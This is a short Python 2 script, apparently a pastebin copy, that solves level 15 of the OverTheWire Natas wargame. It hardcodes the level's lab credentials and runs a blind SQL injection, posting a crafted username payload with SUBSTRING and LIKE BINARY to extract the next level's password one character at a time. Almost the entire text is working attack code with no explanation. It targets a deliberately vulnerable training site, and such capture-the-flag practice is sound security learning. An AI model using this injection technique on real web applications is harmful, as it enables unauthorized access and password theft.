1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import requests
import string

auth = ("natas15", "m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV")
url = "http://natas15.natas.labs.overthewire.org/index.php"
sess = requests.session(auth=auth)
data = {}
alphabet = string.ascii_letters + string.digits

query = 'natas16" AND SUBSTRING(password, %d, 1) LIKE BINARY "%s" #'
password = ""

for i in range(1, 70):
    for c in alphabet:
        data["username"] = query % (i, c)
        r = sess.post(url, data, auth=auth).content
        if "user exists" in r:
            password += c
            print "Current pass:", password
            break
    else:
         break

print "\nDone"

This paste never expires. View raw. Pasted through import.